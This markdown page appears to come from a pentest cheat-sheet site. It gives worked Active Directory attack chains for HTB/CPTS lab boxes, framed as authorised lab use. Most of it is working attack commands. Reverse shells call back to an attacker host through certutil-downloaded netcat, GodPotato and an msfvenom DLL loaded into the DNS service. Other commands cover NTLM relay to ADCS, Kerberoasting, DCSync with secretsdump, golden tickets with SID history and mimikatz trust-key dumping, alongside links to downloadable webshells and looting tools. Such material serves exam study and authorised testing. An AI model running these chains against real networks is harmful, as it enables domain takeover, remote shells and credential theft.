worked-chains.md (26106B)
1 --- 2 title: "Appendix — Worked Chains" 3 description: "CPTS attack-flow reference for appendix — worked chains in an authorised engagement." 4 category: pentest-workflow 5 subcategory: "CPTS Attack Flow" 6 order: 16 7 tags: ["htb", "cpts", "htb-attack-flow", "htb-attack-flow-appendix", "pentest-workflow"] 8 tools: ["NetExec", "Impacket", "BloodHound CE", "Certipy", "Rubeus", "Responder", "bloodyAD", "mimikatz"] 9 difficulty: advanced 10 updated: "2026-08-29" 11 source: "vault:Pentest Attack Flow/16 - Appendix - Worked Chains.md" 12 --- 13 > [!dashboard] Attack-flow navigation 14 > **Dashboard:** [HTB Pentest Attack Flow](/sheets/pentest-workflow/attack-flow-dashboard) 15 > 16 > **Section:** 16 of 17 · **Focus:** Appendix — Worked Chains 17 > 18 > **Previous:** [Stage 11 — Documentation and Reporting](/sheets/pentest-workflow/documentation-and-reporting) · **Next:** [Tool Index](/sheets/pentest-workflow/tool-index) 19 20 --- 21 # 🧬 APPENDIX — Worked Chains (real boxes, stage-mapped) 22 23 The guide is organised by technique; this is the other axis — how the techniques *compose* on real boxes. Each chain is annotated with the guide's stages `[S#]` so you can see the pattern and jump to the deep section. Pattern-recognition beats memorising commands: most AD boxes are **enum → a foothold cred → BloodHound → one ACL/roast edge → DCSync**. 24 25 Stage map: `[S0]`=[Passive Recon](/sheets/pentest-workflow/passive-external-recon) · `[S1]`=[Host Discovery](/sheets/pentest-workflow/recon-and-host-discovery) · `[S2]`=[Web](/sheets/pentest-workflow/web-enumeration-and-exploitation) · `[S3]`=[Service Enum](/sheets/pentest-workflow/service-enumeration) · `[S4]`=[AD Enum](/sheets/pentest-workflow/active-directory-enumeration) · `[S5]`=[Kerberos](/sheets/pentest-workflow/kerberos-attacks) · `[S6]`=[ACL Abuse](/sheets/pentest-workflow/acl-and-object-abuse) · `[S7]`=[ADCS](/sheets/pentest-workflow/adcs-and-certificate-abuse) · `[S8]`=[Passwords](/sheets/pentest-workflow/password-attacks-and-credential-hunting) · `[S9]`=[PrivEsc](/sheets/pentest-workflow/privilege-escalation) · `[S10]`=[Lateral/Loot](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) · Trusts=[Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest). 26 27 > [!tip] The universal AD shape 28 > `[S1]` scan → `[S3/S4]` null/anon enum for users+shares → a **first credential** (share loot, AS-REP roast, password in a description, a poisoned hash) → `[S4]` BloodHound *as that user* → `[S5/S6/S7]` the one edge that escalates (roast / ACL / delegation / ESC) → `[S10]` DCSync + PtH the Administrator. Every new cred = re-run BloodHound. 29 30 <figure class="flow plate corners"> 31 <figcaption class="flow__cap"><span class="flow__kind">Universal AD chain</span><span class="flow__dir">TD</span></figcaption> 32 <div class="flow__body"> 33 <div class="flow__diagram" data-dir="td"> 34 <div class="flow-rank"><div class="flow-node is-entry">Web foothold</div></div> 35 <div class="flow-edge"></div> 36 <div class="flow-rank"><div class="flow-node">Local privesc</div></div> 37 <div class="flow-edge"></div> 38 <div class="flow-rank"><div class="flow-node">AD enum + BloodHound</div></div> 39 <div class="flow-branches"> 40 <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">Kerberoast</div></div> 41 <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">ACL edge</div></div> 42 <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">ADCS ESC</div></div> 43 <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">Relay / RBCD</div></div> 44 </div> 45 <div class="flow-join"></div> 46 <div class="flow-rank"><div class="flow-node is-goal">DCSync / DA</div></div> 47 <div class="flow-edge"></div> 48 <div class="flow-rank"><div class="flow-node">Cross-forest via trusts</div></div> 49 </div> 50 </div> 51 </figure> 52 53 > [!warning] Authorized lab use 54 > All chains below assume an authorized HTB/CPTS-style lab. Every AD write (ACEs, SPNs, RBCD, shadow creds) is reversible — record what you change and revert it ([Stage 06 OPSEC](/sheets/pentest-workflow/acl-and-object-abuse)). 55 56 --- 57 58 ## Chain A — External web → foothold → privesc → DA (kerberoast + ESC8) 59 60 The classic CPTS capstone shape: internet-facing web app on a domain-joined host, then the full internal AD grind. MITRE: T1190 (Exploit Public-Facing Application) → T1558.003 (Kerberoasting) → T1649 (ESC8). 61 62 1. **`[S0/S1]` Recon.** Subdomains, ports, vhosts: 63 ```bash 64 nmap -sCV -p- --min-rate 2000 -oA full $IP 65 ffuf -u http://$TARGET -H "Host: FUZZ.$TARGET" -w $SECLISTS/Discovery/DNS/subdomains-top1million-5000.txt 66 ``` 67 2. **`[S2]` Web → RCE.** Enumerate the app (ffuf dirs, tech fingerprint, known CVE). Upload a webshell matched to the stack — stage from the toolkit: [nt-webshell-rosepine.aspx](/downloads/pentest-workflow/nt-webshell-rosepine.aspx) ([SHA-256](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256) · [GPG signature](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256.asc)) for IIS, [rp-shell.php](/downloads/pentest-workflow/rp-shell.php) ([SHA-256](/downloads/pentest-workflow/rp-shell.php.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.php.sha256.asc)) for PHP, [rp-shell.jsp](/downloads/pentest-workflow/rp-shell.jsp) ([SHA-256](/downloads/pentest-workflow/rp-shell.jsp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.jsp.sha256.asc)) for Tomcat (classic ASP: [rp-shell.asp](/downloads/pentest-workflow/rp-shell.asp) ([SHA-256](/downloads/pentest-workflow/rp-shell.asp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.asp.sha256.asc))). 68 ```powershell 69 certutil -urlcache -split -f http://$LHOST:8000/nc64.exe C:\Windows\Temp\nc64.exe 70 C:\Windows\Temp\nc64.exe $LHOST 443 -e cmd.exe 71 ``` 72 Toolkit: [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) 73 3. **`[S9]` Local privesc** (if the shell lands as a service account — often `iis apppool\...` with **SeImpersonatePrivilege**): 74 ```powershell 75 .\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc64.exe $LHOST 444 -e cmd.exe" 76 ``` 77 Toolkit: [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) (or `GodPotato-NET35.exe`, `PrintSpoofer64.exe`, `SweetPotato.exe` — pick per OS build/Spooler state; see [Stage 09](/sheets/pentest-workflow/privilege-escalation)). 78 4. **`[S4]` BloodHound as the foothold user/machine:** 79 ```bash 80 bloodhound-ce-python -d $DOMAIN -u "$U" -p "$P" -ns $DCIP -c All --zip 81 ``` 82 On-host alternative: [SharpHound.zip](/downloads/pentest-workflow/SharpHound.zip) ([SHA-256](/downloads/pentest-workflow/SharpHound.zip.sha256) · [GPG signature](/downloads/pentest-workflow/SharpHound.zip.sha256.asc)) 83 5. **`[S5]` Kerberoast** an SPN account visible in the graph: 84 ```bash 85 GetUserSPNs.py "$DOMAIN/$U:$P" -dc-ip $DCIP -request -outputfile kerb.hash 86 hashcat -m 13100 kerb.hash $ROCKYOU -r /usr/share/hashcat/rules/best64.rule 87 ``` 88 Deep dive: [Stage 05](/sheets/pentest-workflow/kerberos-attacks). 89 6. **`[S7]` The cracked service account can reach AD CS.** Find and exploit ESC8 (web enrollment + no EPA): 90 ```bash 91 certipy-ad find -u "$U@$DOMAIN" -p "$P" -dc-ip $DCIP -vulnerable -stdout 92 ntlmrelayx.py -t http://ca.$DOMAIN/certsrv/certfnsh.asp -smb2support --adcs --template DomainController 93 PetitPotam.py -u "$U" -p "$P" -d $DOMAIN $LHOST $DCIP # coerce DC auth to the relay 94 ``` 95 Toolkit: [PetitPotam.py](/downloads/pentest-workflow/PetitPotam.py) ([SHA-256](/downloads/pentest-workflow/PetitPotam.py.sha256) · [GPG signature](/downloads/pentest-workflow/PetitPotam.py.sha256.asc)) · certipy: [Certipy](https://github.com/ly4k/Certipy) · relay: [Impacket ntlmrelayx](https://github.com/fortra/impacket). 96 7. **`[S10]` Use the relayed DC cert → DCSync:** the relay already dropped `DC01$.pfx` — no manual `req` needed (the DomainController template has no enrollee-supplies-subject anyway): 97 ```bash 98 certipy-ad auth -pfx 'DC01$.pfx' -dc-ip $DCIP # -> DC01$ NT hash (+TGT) 99 secretsdump.py "$DOMAIN/DC01\$@$DC" -hashes :$NT -just-dc # DCSync as the DC itself 100 ``` 101 8. **Document & revert.** Capture proof (`secretsdump` output, cert request IDs), remove the webshell and staged binaries, log ESC8 remediation ([Stage 11](/sheets/pentest-workflow/documentation-and-reporting)). 102 103 > [!example] When to reach for this chain 104 > Any box where the only ingress is 80/443 and the DC is not directly reachable. The web foothold host *is* your pivot into `[S4]`. 105 106 > [!opsec] Detection notes 107 > Webshells (T1505.003) are the #1 caught artifact — use a random name, delete after. Coercion + relay (T1187, T1557.001) fires Defender for Identity and creates Event 4768/4769 anomalies. ESC8 cert requests appear on the CA — note request IDs for cleanup. 108 109 --- 110 111 ## Chain B — ASREPRoast → GenericWrite → targeted kerberoast → DCSync 112 113 No creds needed to start; pure identity attacks. MITRE: T1558.004 (AS-REP Roasting) → T1558.003 → T1003.006 (DCSync). 114 115 1. **`[S4]` Build a user list** without creds: 116 ```bash 117 kerbrute userenum --dc $DCIP -d $DOMAIN $SECLISTS/Usernames/xato-net-10-million-usernames.txt 118 enum4linux-ng -A $IP | tee enum.txt # or rpcclient -U "" -N → enumdomusers 119 ``` 120 Toolkit: [kerbrute_linux_amd64](/downloads/pentest-workflow/kerbrute_linux_amd64) ([SHA-256](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256.asc)) 121 2. **`[S5]` AS-REP roast** the list ([Stage 05](/sheets/pentest-workflow/kerberos-attacks)): 122 ```bash 123 GetNPUsers.py $DOMAIN/ -usersfile users.txt -no-pass -dc-ip $DCIP -outputfile asrep.hash 124 hashcat -m 18200 asrep.hash $ROCKYOU 125 ``` 126 3. **`[S4]` BloodHound as the cracked user** (`bloodhound-ce-python -c All`) — the graph shows **GenericWrite** on a privileged service account (e.g. `svc_sql`). 127 4. **`[S6]` Targeted kerberoast** — write an SPN onto the victim, roast it, clean up: 128 ```bash 129 targetedKerberoast.py -d $DOMAIN -u "$U" -p "$P" --request-user svc_sql -o targeted.hash 130 hashcat -m 13100 targeted.hash $ROCKYOU 131 ``` 132 Toolkit: [targetedKerberoast.py](/downloads/pentest-workflow/targetedKerberoast.py) ([SHA-256](/downloads/pentest-workflow/targetedKerberoast.py.sha256) · [GPG signature](/downloads/pentest-workflow/targetedKerberoast.py.sha256.asc)) — it removes the SPN afterwards; verify anyway (`Get-ADUser svc_sql -Properties servicePrincipalName`). 133 5. **`[S6]` The cracked svc_sql has GenericAll/WriteDACL on a DA-path group** (or the domain root). Add DCSync rights: 134 ```bash 135 bloodyAD --host $DCIP -d $DOMAIN -u "$U" -p "$P" add dcsync svc_sql 136 # or: dacledit.py -action write -rights DCSync -principal svc_sql -target-dn "DC=corp,DC=local" "$DOMAIN/$U:$P" -dc-ip $DCIP 137 ``` 138 On-host equivalent: [StandIn_v13_Net35_45.zip](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip) ([SHA-256](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256) · [GPG signature](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256.asc)) 139 6. **`[S10]` DCSync and PtH:** 140 ```bash 141 secretsdump.py "$DOMAIN/svc_sql:$P@$DC" -just-dc-user administrator 142 evil-winrm -i $DCIP -u administrator -H $NT 143 ``` 144 7. **Revert:** remove the DCSync ACE (`bloodyAD remove dcsync svc_sql`), confirm the SPN cleanup, log it. 145 146 > [!warning] Pitfalls 147 > - AS-REP hash mode is **18200**, not 13100 — read the `$krb5asrep$` prefix. 148 > - GenericWrite ≠ instant roast: you need the SPN write (targetedKerberoast) or shadow credentials (`pywhisker` / [Whisker.exe](/downloads/pentest-workflow/Whisker.exe) ([SHA-256](/downloads/pentest-workflow/Whisker.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Whisker.exe.sha256.asc))). 149 > - `WriteDACL` on the domain root → DCSync; on a user → targeted roast/shadow creds; on a group → add member. Pick per object type. 150 151 --- 152 153 ## Chain C — No creds at all: LLMNR poison → relay → LDAP → RBCD 154 155 For flat networks where SMB signing is off and LDAP signing/channel binding aren't enforced. MITRE: T1557.001 (LLMNR/NBT-NS Poisoning) → T1003.006 via delegation abuse. 156 157 1. **`[S3]` Poison and capture** ([Stage 03](/sheets/pentest-workflow/service-enumeration)): 158 ```bash 159 sudo responder -I eth0 -dwv 160 # Windows-side when already on a host: Inveigh 161 ``` 162 Toolkit: [Inveigh.ps1](/downloads/pentest-workflow/Inveigh.ps1) ([SHA-256](/downloads/pentest-workflow/Inveigh.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/Inveigh.ps1.sha256.asc)) (`Invoke-Inveigh -ConsoleOutput Y`). 163 2. **Crack any NetNTLMv2 that drops** (`hashcat -m 5600`) — even one weak user unlocks `[S4]` BloodHound. 164 3. **`[S3]` Relay instead of crack** — check signing first: 165 ```bash 166 nxc smb $SUBNET --gen-relay-list relay.txt # hosts with signing disabled 167 ``` 168 4. **Relay to LDAP(S) → configure RBCD.** Start `ntlmrelayx` and drop a controlled machine account ([Stage 06](/sheets/pentest-workflow/acl-and-object-abuse)): 169 ```bash 170 ntlmrelayx.py -t ldap://$DCIP -smb2support --delegate-access --escalate-user 'EVILPC$' -l loot 171 addcomputer.py -computer-name 'EVILPC$' -computer-pass 'Ev1lPass!' "$DOMAIN/$U:$P" -dc-ip $DCIP # if MAQ>0 and no relay create 172 ``` 173 Trigger a lookup (`responder -I eth0` + browse, or coerce with [PetitPotam](https://github.com/topotam/PetitPotam)/[Coercer](https://github.com/p0dalirius/Coercer)) and the victim machine's `msDS-AllowedToActOnBehalfOfOtherIdentity` now trusts `EVILPC$`. 174 5. **`[S5]` S4U2Self → S4U2Proxy** — impersonate Administrator to the victim: 175 ```bash 176 getST.py "$DOMAIN/EVILPC$:Ev1lPass!" -spn cifs/victim.$DOMAIN -impersonate administrator -dc-ip $DCIP 177 export KRB5CCNAME=administrator@cifs_victim.$DOMAIN@$DOMAIN.ccache 178 psexec.py -k -no-pass victim.$DOMAIN 179 ``` 180 6. **`[S10]` Loot & pivot**: `secretsdump.py -k` the victim, pivot onward with ligolo-ng — [ligolo-ng_agent_linux_amd64.tar.gz](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256.asc)) / [ligolo-ng_agent_windows_amd64.zip](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256.asc)) + [chisel.exe](/downloads/pentest-workflow/chisel.exe) ([SHA-256](/downloads/pentest-workflow/chisel.exe.sha256) · [GPG signature](/downloads/pentest-workflow/chisel.exe.sha256.asc)) / [chisel_linux_amd64](/downloads/pentest-workflow/chisel_linux_amd64) ([SHA-256](/downloads/pentest-workflow/chisel_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/chisel_linux_amd64.sha256.asc)). 181 182 > [!opsec] Relay caveats 183 > Relaying is loud: LLMNR/NBT-NS broadcasts + auth coercion are textbook Defender for Identity / honeypot bait (T1557.001). Never relay to a DC unless the engagement says so; never disable the Spooler service as a "fix" on a production box. LDAP relay requires LDAP signing off *and* (for LDAPS) channel binding off — check with `nxc ldap $DCIP -u '' -p '' -M ldap-checker` style modules before burning time. 184 185 --- 186 187 ## Chain D — DA in child domain → forest root → cross-forest (SID history) 188 189 The trusts capstone. MITRE: T1134 (SID-History Injection), T1550.003 (PtT). Deep dive: [Domain Trusts and Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest). 190 191 1. **Map the trust topology** (on-host: `nltest /domain_trusts`, or PowerView `Get-DomainTrust` — [PowerView.ps1](/downloads/pentest-workflow/PowerView.ps1) ([SHA-256](/downloads/pentest-workflow/PowerView.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PowerView.ps1.sha256.asc))): 192 ```bash 193 ldeep ldap -u "$U" -p "$P" -d child.$DOMAIN -s ldap://$DCIP trusts 194 ``` 195 2. **Child → parent (intra-forest).** Trust key → golden ticket with SID history (Enterprise Admins RID 519): 196 ```bash 197 lookupsid.py "$DOMAIN/$U:$P@$DCIP" | head -3 # child domain SID 198 secretsdump.py child/administrator@child-dc.child.$DOMAIN -just-dc-user 'CHILD\krbtgt' -hashes :$NT 199 ticketer.py -nthash <KRBTGT_NT> -domain child.$DOMAIN -domain-sid S-1-5-21-... -extra-sid S-1-5-21-<PARENT>-519 administrator 200 raiseChild.py child.$DOMAIN/$U:"$P" # one-shot alternative 201 export KRB5CCNAME=administrator.ccache 202 secretsdump.py -k parent.$DOMAIN/administrator@parent-dc.parent.$DOMAIN -just-dc 203 ``` 204 3. **Forest → trusting forest (external/forest trust).** From DA in forest A, dump the **trust account hash** for forest B: 205 ```bash 206 mimikatz.exe "lsadump::trust /patch" "exit" 207 # or: secretsdump.py ... (trust accounts end in '$', e.g. TRUSTEDDOM$) 208 ticketer.py -nthash <TRUST_NT> -domain forest-a.local -domain-sid S-1-5-21-A -extra-sid S-1-5-21-B-519 administrator 209 ``` 210 Toolkit: [mimikatz_trunk.zip](/downloads/pentest-workflow/mimikatz_trunk.zip) ([SHA-256](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256) · [GPG signature](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256.asc)) 211 4. **`[S10]` Consume the ticket** in the trusting forest: `KRB5CCNAME=... secretsdump.py -k admin@dc.forest-b.local -just-dc`. 212 213 > [!warning] Gotchas 214 > - **SID filtering** on external trusts strips SIDs <1000 from *other* forests — but intra-forest (parent↔child) never filters, which is why child→root always works. Extra SID `-519` (Enterprise Admins) for intra-forest; for cross-forest you may be limited to RIDs ≥1000 — inject a known admin group RID from forest B instead. 215 > - RC4 trust keys are the norm; if `KDC_ERR_ETYPE_NOSUPP`, use AES (`-aesKey`). 216 > - Trust tickets are time-sensitive — `faketime`/ntpdate first ([Dashboard Quick Setup](/sheets/pentest-workflow/attack-flow-dashboard)). 217 218 --- 219 ## Chain E — MSSQL links → xp_cmdshell → SeImpersonate → SYSTEM 220 221 SQL Server is a privilege-escalation engine when links and `sysadmin` line up. MITRE: T1505.001 (SQL Stored Procedures) → T1134 (Token Impersonation). 222 223 1. **`[S3]` Find MSSQL and authenticate** (creds from spray/roast/loot): 224 ```bash 225 nxc mssql $SUBNET -u "$U" -p "$P" --local-auth 226 mssqlclient.py "$DOMAIN/$U:$P@$IP" -windows-auth 227 ``` 228 2. **Enable `xp_cmdshell` for a command channel:** 229 ```sql 230 EXEC sp_configure 'show advanced options',1; RECONFIGURE; 231 EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; 232 EXEC xp_cmdshell 'whoami'; 233 ``` 234 Or directly from nxc: `nxc mssql $IP -u "$U" -p "$P" --local-auth -x whoami`. 235 3. **Enumerate linked servers and impersonate along the chain:** 236 ```sql 237 EXEC sp_linkedservers; 238 SELECT IS_SRVROLEMEMBER('sysadmin'); 239 EXEC ('EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE') AT LINKED02; 240 EXEC ('EXEC xp_cmdshell ''whoami''') AT LINKED02; 241 ``` 242 nxc shortcut: `nxc mssql $IP -u "$U" -p "$P" -M mssql_priv` (finds impersonation paths). Each hop may re-authenticate as a more privileged login — walk links until you land `sysadmin` on a high-value box. Metasploit's `mssql_linkcrawler` automates the crawl. 243 4. **`[S9]` SeImpersonate → SYSTEM.** SQL service accounts (`nt service\mssqlserver`) almost always hold SeImpersonatePrivilege: 244 ```powershell 245 .\GodPotato-NET4.exe -cmd "net localgroup administrators $U /add" 246 ``` 247 Toolkit: [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) — fallbacks: [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) (needs Spooler running), [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)), legacy [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) on pre-2019 builds. 248 5. **`[S10]` Loot the host**: dump local creds with [LaZagne.exe](/downloads/pentest-workflow/LaZagne.exe) ([SHA-256](/downloads/pentest-workflow/LaZagne.exe.sha256) · [GPG signature](/downloads/pentest-workflow/LaZagne.exe.sha256.asc)), DPAPI blobs with [SharpDPAPI.exe](/downloads/pentest-workflow/SharpDPAPI.exe) ([SHA-256](/downloads/pentest-workflow/SharpDPAPI.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpDPAPI.exe.sha256.asc)), then hunt domain shares with [Snaffler.exe](/downloads/pentest-workflow/Snaffler.exe) ([SHA-256](/downloads/pentest-workflow/Snaffler.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Snaffler.exe.sha256.asc)) — SQL boxes often hold connection strings with cleartext domain creds, feeding you back to `[S4]`. 249 250 > [!tip] CPTS exam tip 251 > MSSQL on 1433 with weak/linked creds is a favourite CPTS escalation. Always check `sp_linkedservers` and impersonation *before* reaching for kernel exploits — the intended path is usually one `EXEC ... AT LINK` away. 252 253 --- 254 255 ## Chain F — HTB box patterns (Forest · Resolute · Fluffy) 256 257 ### Forest — AS-REP → Exchange-perms WriteDACL → DCSync 258 1. `[S3]` RPC/LDAP null session lists domain users (`rpcclient -U "" -N` → `enumdomusers`). 259 2. `[S5]` **svc-alfresco** has no Kerberos preauth → AS-REP roast (`GetNPUsers.py -no-pass`) → crack (`hashcat -m 18200` against `$ROCKYOU`). 260 3. `[S4]` BloodHound as svc-alfresco: it's in **Account Operators** + **Exchange Windows Permissions** (WriteDACL on the domain root). 261 4. `[S6]` grant self DCSync (`dacledit.py -action write -rights DCSync` / `bloodyAD add dcsync`). 262 5. `[S10]` `secretsdump.py -just-dc` → PtH Administrator (`evil-winrm -H $NT`). 263 Note: HTB-Forest. 264 265 ### Resolute — password in a description → spray → DnsAdmins DLL → SYSTEM 266 1. `[S4]` LDAP/RPC enum surfaces a cleartext password in a user **description** field (`Welcome123!`) — always grep descriptions and `info` fields ([Stage 04](/sheets/pentest-workflow/active-directory-enumeration)). 267 2. `[S8]` spray it across all users (`nxc smb $DCIP -u users.txt -p 'Welcome123!' --continue-on-success`) → hits **melanie** ([Stage 08](/sheets/pentest-workflow/password-attacks-and-credential-hunting)). 268 3. `[S10]` WinRM in (`evil-winrm -u melanie -p ...`) → hunt the host, find creds for **ryan** (registry `AutoLogon`, console history). 269 4. ryan is in **DnsAdmins** → `[S9]` load a malicious DLL into the DNS service: 270 ```cmd 271 msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f dll > rev.dll 272 dnscmd $DC /config /serverlevelplugindll \\$LHOST\smb\rev.dll 273 sc \\$DC stop dns && sc \\$DC start dns 274 ``` 275 → SYSTEM on the DC. Note: Resolute. 276 277 ### Fluffy — file-format NTLM capture → Shadow Creds → ADCS 278 1. `[S3]` writable SMB share → drop a malicious `.library-ms` (CVE-2025-24071) so opening the share coerces NTLM auth → capture with [Responder](https://github.com/lgandx/Responder). 279 2. `[S8]` crack **j.fleischman** (`hashcat -m 5600`). 280 3. `[S4]` BloodHound: **GenericWrite** onto service accounts. 281 4. `[S6]` Shadow Credentials (`bloodyAD add shadowCredentials` / [pywhisker](https://github.com/ShutdownRepo/pywhisker)) to take **winrm_svc**, then again onto **ca_svc**. On-host equivalent: [Whisker.exe](/downloads/pentest-workflow/Whisker.exe) ([SHA-256](/downloads/pentest-workflow/Whisker.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Whisker.exe.sha256.asc)). 282 5. `[S7]` ca_svc can enroll a vulnerable template → ADCS ESC (`certipy-ad find -vulnerable` → `req` → `auth`) → auth as DA → `[S10]` own the domain. 283 Notes: HTB-Fluffy · Fluffy Attack Plan. 284 285 ### The web-to-AD pattern (many CPTS/AEN boxes) 286 `[S0/S2]` external recon + web enum finds an app → `[S2]` an app-specific exploit (upload/LFI/known-CVE/thick-client creds) → foothold shell on a domain-joined host → `[S9]` local privesc if needed → `[S4]` you're now inside AD: BloodHound + LDAP cookbook as the machine/user → follow the AD shape above. The [**Attacking Enterprise Networks**](/sheets/pentest-workflow/htb-attack-flow-playbook) capstone is exactly this, end to end — see that sheet for the full INLANEFREIGHT chain written out command by command. Chain A above is this pattern written out step by step. 287 288 > [!note] More box notes to mine for patterns 289 > Garfield (Season 10), the Pro-Lab chains (Dante, Zephyr), and the AD Track. Same shape scaled up: multiple hosts, pivots between segments ([Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot)), and trusts ([Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest)) once you're DA in the first domain. 290 291 > [!example] Pattern-recognition cheat table 292 > | Box | First cred | Escalation edge | DA via | 293 > |---|---|---|---| 294 > | Forest | AS-REP roast (svc-alfresco) | Exchange WriteDACL on domain | DCSync | 295 > | Resolute | Description-field password → spray | DnsAdmins | Malicious DNS plugin DLL | 296 > | Fluffy | NTLM capture via .library-ms | GenericWrite → Shadow Creds | ADCS ESC enroll | 297 > | Typical CPTS | Share loot / kerberoast | One ACL or ESC edge | DCSync + PtH | 298 299 --- 300 301 > [!navigation] Continue the attack flow 302 > **Previous:** [Stage 11 — Documentation and Reporting](/sheets/pentest-workflow/documentation-and-reporting) 303 > 304 > **Dashboard:** [HTB Pentest Attack Flow](/sheets/pentest-workflow/attack-flow-dashboard) 305 > 306 > **Next:** [Tool Index](/sheets/pentest-workflow/tool-index)